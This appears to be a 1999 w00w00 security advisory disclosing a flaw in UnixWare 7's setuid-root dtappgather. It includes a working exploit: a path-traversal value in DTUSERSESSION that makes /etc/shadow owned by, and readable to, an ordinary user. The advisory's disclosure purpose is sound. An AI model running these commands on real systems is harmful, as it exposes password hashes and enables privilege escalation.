Subject: [w00giving '99] UnixWare 7's dtappgather
w00w00 Security Development (WSD)
Discovered by: K2 (
UnixWare 7's dtappgather runs with superuser privileges, but improperly
check $DTUSERSESSION to ensure that the file is readable/writeable or
owned by the user running it.
rain:/usr/dt/bin$ export DTUSERSESSION=../../../../etc/shadow
rain:/usr/dt/bin$ ./dtappgather
MakeDirectory: /var/dt/appconfig/appmanager/../../../../etc/shadow: File
rain:/usr/dt/bin$ ls -la /etc/shadow
-r-xr-xr-x 1 ktwo other 358 Oct 26 04:37 /etc/shadow*
Because SCO doesn't distribute source code for Unixware, we
must disassemble the binaries and insert bytes.
Contributors to w00giving '99: awr, jobe, Sangfroid, rfp, vacuum, and
People who deserve hellos: nocarrier, minus, daveg, rosieriv, nny, marc,
and w00god blake
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